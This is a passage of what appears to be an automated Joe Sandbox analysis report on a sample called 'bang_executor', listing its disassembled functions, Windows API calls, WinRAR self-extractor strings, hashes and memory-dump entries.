                                        • Instruction ID: 299e4ebcaa0829908590d3f3ce15a57930d19474712456b09a6c6e948c0750db
                                        • Opcode Fuzzy Hash: 976ff20184d33338b49741b86467a40b62603a701d88faf052de3c062a103a74
                                        • Instruction Fuzzy Hash: C701D43A10DB136EE62527B4BC8A76F2E54FFA2370B601329F110860E0FF514C65EA84
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050B9A5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,005250C4,00506E12,005250C4,?,?,0050688D,?,?,005250C4), ref: 0050B9A9
                                        • _free.LIBCMT ref: 0050B9DC
                                        • _free.LIBCMT ref: 0050BA04
                                        • SetLastError.KERNEL32(00000000,?,005250C4), ref: 0050BA11
                                        • SetLastError.KERNEL32(00000000,?,005250C4), ref: 0050BA1D
                                        • _abort.LIBCMT ref: 0050BA23
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: 573a84b4a7313e6d7dc32470e06b26cd59bda3a3668e0e121ff10f18dbfe6bd1
                                        • Instruction ID: 5840ef56461c54e4f390a2eb7cdfadda2ef9264752d45369f9b5e855d9658604
                                        • Opcode Fuzzy Hash: 573a84b4a7313e6d7dc32470e06b26cd59bda3a3668e0e121ff10f18dbfe6bd1
                                        • Instruction Fuzzy Hash: 79F0F436248A0377E61573656C8EBAF2D39FFD1770F290824F615A22D2FF618C065020
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FD41C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 149COMMON
                                        Download Yara Rule
                                        APIs
                                        • EndDialog.USER32(?,00000001), ref: 004FD57B
                                        • GetDlgItemTextW.USER32(?,00000066,00001000,00000200), ref: 004FD591
                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 004FD5B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ItemText$Dialog
                                        • String ID: GETPASSWORD1$Software\WinRAR SFX
                                        • API String ID: 1770891597-1315819833
                                        • Opcode ID: 480b39f3b2b0d99d054358acc901641b5081b9bbb261782c5842035180ada9f6
                                        • Instruction ID: 73cbac32c94fc547a41c453943c700293fccbfb9b58ef8c7e33bb048da361e1f
                                        • Opcode Fuzzy Hash: 480b39f3b2b0d99d054358acc901641b5081b9bbb261782c5842035180ada9f6
                                        • Instruction Fuzzy Hash: DD41C27290420DABEB30AB64CC49FFE77ADEF59304F10042AF709E3181DB74A9449B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EE033 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004F2663: _wcslen.LIBCMT ref: 004F2669
                                          • Part of subcall function 004ED848: _wcsrchr.LIBVCRUNTIME ref: 004ED85F
                                        • _wcslen.LIBCMT ref: 004EE105
                                        • _wcslen.LIBCMT ref: 004EE14D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen$_wcsrchr
                                        • String ID: .exe$.rar$.sfx
                                        • API String ID: 3513545583-31770016
                                        • Opcode ID: 894ec50b6ba220bd7cfd4028d6d3f6959daa6b93dc403d48d5c36f115979f914
                                        • Instruction ID: 55282c58386dee3fdcf522f743088581fdabb33258e5aa2bcabaa4965ebf600f
                                        • Opcode Fuzzy Hash: 894ec50b6ba220bd7cfd4028d6d3f6959daa6b93dc403d48d5c36f115979f914
                                        • Instruction Fuzzy Hash: 954126225007A1D5D7326F338856A7BB7A4EF4174AB104D0FFA85AB280E7A99DC1C35E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EDA1E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 134COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 004EDA59
                                        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,004EBD19,?,?,00000800,?,?,?,004EBCD4), ref: 004EDB02
                                        • _wcslen.LIBCMT ref: 004EDB70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen$CurrentDirectory
                                        • String ID: UNC$\\?\
                                        • API String ID: 3341907918-253988292
                                        • Opcode ID: d67541bc472da77df9d715bf3d1094b5c7368379443e491b6913b380c675886d
                                        • Instruction ID: ea921a68298df3f5d1927972ed9b8ec05137f18a5b72b5f36764e7480b1200ad
                                        • Opcode Fuzzy Hash: d67541bc472da77df9d715bf3d1094b5c7368379443e491b6913b380c675886d
                                        • Instruction Fuzzy Hash: CD412431C043C16AD620AB228C81DFF77BCAF49745F01086FF584D3241E7ACAA85C66A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E10E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: %P
                                        • API String ID: 176396367-2070853540
                                        • Opcode ID: 31b487751cde02512edbd3c988f4c079efc5091408b5d5de52faf4413260be27
                                        • Instruction ID: 5298ae2476df1317f569f6aa5b18d2189c8c604ea1ec3d51a892fc4a5e35f708
                                        • Opcode Fuzzy Hash: 31b487751cde02512edbd3c988f4c079efc5091408b5d5de52faf4413260be27
                                        • Instruction Fuzzy Hash: 234184715047569BC725DF388D599AFBBE8FF89300F00091EFA89D3251DB34A9098B96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FD9DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadBitmapW.USER32(00000065), ref: 004FD9ED
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 004FDA12
                                        • DeleteObject.GDI32(00000000), ref: 004FDA44
                                        • DeleteObject.GDI32(00000000), ref: 004FDA67
                                          • Part of subcall function 004FC652: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,004FDA3D,00000066), ref: 004FC665
                                          • Part of subcall function 004FC652: SizeofResource.KERNEL32(00000000,?,?,?,004FDA3D,00000066), ref: 004FC67C
                                          • Part of subcall function 004FC652: LoadResource.KERNEL32(00000000,?,?,?,004FDA3D,00000066), ref: 004FC693
                                          • Part of subcall function 004FC652: LockResource.KERNEL32(00000000,?,?,?,004FDA3D,00000066), ref: 004FC6A2
                                          • Part of subcall function 004FC652: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,004FDA3D,00000066), ref: 004FC6BD
                                          • Part of subcall function 004FC652: GlobalLock.KERNEL32(00000000,?,?,?,?,?,004FDA3D,00000066), ref: 004FC6CE
                                          • Part of subcall function 004FC652: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 004FC737
                                          • Part of subcall function 004FC652: GlobalUnlock.KERNEL32(00000000), ref: 004FC756
                                          • Part of subcall function 004FC652: GlobalFree.KERNEL32(00000000), ref: 004FC75D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                        • String ID: ]
                                        • API String ID: 1428510222-3352871620
                                        • Opcode ID: cd489251db8e54d9987b84d7c91ec639ef7ee0a111a5a522ae64b27d664a4fd3
                                        • Instruction ID: 1d9e0565a103d96a9e7e0b0fa2e03ff76f0a5776051a3f337e9666d5775c0970
                                        • Opcode Fuzzy Hash: cd489251db8e54d9987b84d7c91ec639ef7ee0a111a5a522ae64b27d664a4fd3
                                        • Instruction Fuzzy Hash: E0018936C0421D67C72177754C4DABF3A7A9F82719F040016FA08B7391DF388C099AAC
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FF950 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004E1366: GetDlgItem.USER32(00000000,00003021), ref: 004E13AA
                                          • Part of subcall function 004E1366: SetWindowTextW.USER32(00000000,005165F4), ref: 004E13C0
                                        • EndDialog.USER32(?,00000001), ref: 004FF99B
                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 004FF9B1
                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 004FF9C5
                                        • SetDlgItemTextW.USER32(?,00000068), ref: 004FF9D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: RENAMEDLG
                                        • API String ID: 445417207-3299779563
                                        • Opcode ID: 358d8e3ce480e6ab0fed1c3e6cf6cbd5d1e47b7a95b07b7a3dde32b13ba3175a
                                        • Instruction ID: 00fd5fc590264cac373cb4ff07e24f854f46f3e90af7deb2d901206b98cb612e
                                        • Opcode Fuzzy Hash: 358d8e3ce480e6ab0fed1c3e6cf6cbd5d1e47b7a95b07b7a3dde32b13ba3175a
                                        • Instruction Fuzzy Hash: A401F5722842187BE2214B649C49FBB775CFF6A706F104427F341A21A0C7AA9A0DD76A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050A6C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0050A676,?,?,0050A616,?,0051F7B0,0000000C,0050A76D,?,00000002), ref: 0050A6E5
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0050A6F8
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0050A676,?,?,0050A616,?,0051F7B0,0000000C,0050A76D,?,00000002,00000000), ref: 0050A71B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 139ab3e5d87444a7b69041c9438c7d5c91ce8400c9396885504be8585def2456
                                        • Instruction ID: 09e1af6a96c8dcccc7d4973b979512fad69f58b1801041ec6566d612d57dcc3b
                                        • Opcode Fuzzy Hash: 139ab3e5d87444a7b69041c9438c7d5c91ce8400c9396885504be8585def2456
                                        • Instruction Fuzzy Hash: 4BF0AF30A00208BBDB109FA4DC49BEDBFB9FF08701F048168F80AA21A0CB305E84DB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E1366 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004F0244: _swprintf.LIBCMT ref: 004F0284
                                          • Part of subcall function 004F0244: _strlen.LIBCMT ref: 004F02A5
                                          • Part of subcall function 004F0244: SetDlgItemTextW.USER32(?,00522274,?), ref: 004F02FE
                                          • Part of subcall function 004F0244: GetWindowRect.USER32(?,?), ref: 004F0334
                                          • Part of subcall function 004F0244: GetClientRect.USER32(?,?), ref: 004F0340
                                        • GetDlgItem.USER32(00000000,00003021), ref: 004E13AA
                                        • SetWindowTextW.USER32(00000000,005165F4), ref: 004E13C0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                        • String ID: 0$pPR$pPR
                                        • API String ID: 2622349952-1397670162
                                        • Opcode ID: 2e0bd967f4a0d156d4024dba353530120b3b1b78ff5a9e7033efc8f994bfbe95
                                        • Instruction ID: 6647a166621bb325d24c4b88a75020a820850f6e109fa8038daf7d3e74caf6a1
                                        • Opcode Fuzzy Hash: 2e0bd967f4a0d156d4024dba353530120b3b1b78ff5a9e7033efc8f994bfbe95
                                        • Instruction Fuzzy Hash: BAF0817018428CA6EF150F639C0DBFA3FA8AF15319F044255FD4591AA2DBBCC994EA68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F12F6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004F28AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004F28D4
                                          • Part of subcall function 004F28AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004F1309,Crypt32.dll,00000000,004F1383,00000200,?,004F1366,00000000,00000000,?), ref: 004F28F4
                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 004F1315
                                        • GetProcAddress.KERNEL32(0052C1F0,CryptUnprotectMemory), ref: 004F1325
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                        • API String ID: 2141747552-1753850145
                                        • Opcode ID: ae96ef5513db3bb01587adfbe940cc1459d00a0532577d489d9789a72cdf66a0
                                        • Instruction ID: 3776e5bba18301aabaa7b302fd55cc9579b2d75ac98d0a2b6627c7316b379c79
                                        • Opcode Fuzzy Hash: ae96ef5513db3bb01587adfbe940cc1459d00a0532577d489d9789a72cdf66a0
                                        • Instruction Fuzzy Hash: 0BE08670A41745AEF7206F34A909B927EE5AF28700F05C81EE5C993650D6B8D8808B10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005051FA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AdjustPointer$_abort
                                        • String ID:
                                        • API String ID: 2252061734-0
                                        • Opcode ID: dcb1197885b02725990b5725cdd42c31bd63685bd86383c2b5d495c882c032a1
                                        • Instruction ID: 9fa591bdc0157f0395054de2c5a1d217f79aa7f09bb506b207fa8eeb569bba77
                                        • Opcode Fuzzy Hash: dcb1197885b02725990b5725cdd42c31bd63685bd86383c2b5d495c882c032a1
                                        • Instruction Fuzzy Hash: 6651BE76601A07AFDB298F54D845BAFBBA4FF84350F244929E906572D1F771AC80CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050E580 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 0050E589
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0050E5AC
                                          • Part of subcall function 0050BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00506A24,?,0000015D,?,?,?,?,00507F00,000000FF,00000000,?,?), ref: 0050BCC0
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0050E5D2
                                        • _free.LIBCMT ref: 0050E5E5
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0050E5F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: 4c57ad4ad70a0209cbaa48bb04e53f9fc86553e6e6d27cdf8b7f8a9fb933d96d
                                        • Instruction ID: 18413445689f22e5e8014b64b54ed4aaee1d0ee8939233aed5ff0180ec9221ea
                                        • Opcode Fuzzy Hash: 4c57ad4ad70a0209cbaa48bb04e53f9fc86553e6e6d27cdf8b7f8a9fb933d96d
                                        • Instruction Fuzzy Hash: F401D4726012127FA7315BB65C8ECBF6E6DFFC2B683240929F805C2281FE608D01D1B0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050BA29 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,0050BC80,0050D7D8,?,0050B9D3,00000001,00000364,?,0050688D,?,?,005250C4), ref: 0050BA2E
                                        • _free.LIBCMT ref: 0050BA63
                                        • _free.LIBCMT ref: 0050BA8A
                                        • SetLastError.KERNEL32(00000000,?,005250C4), ref: 0050BA97
                                        • SetLastError.KERNEL32(00000000,?,005250C4), ref: 0050BAA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
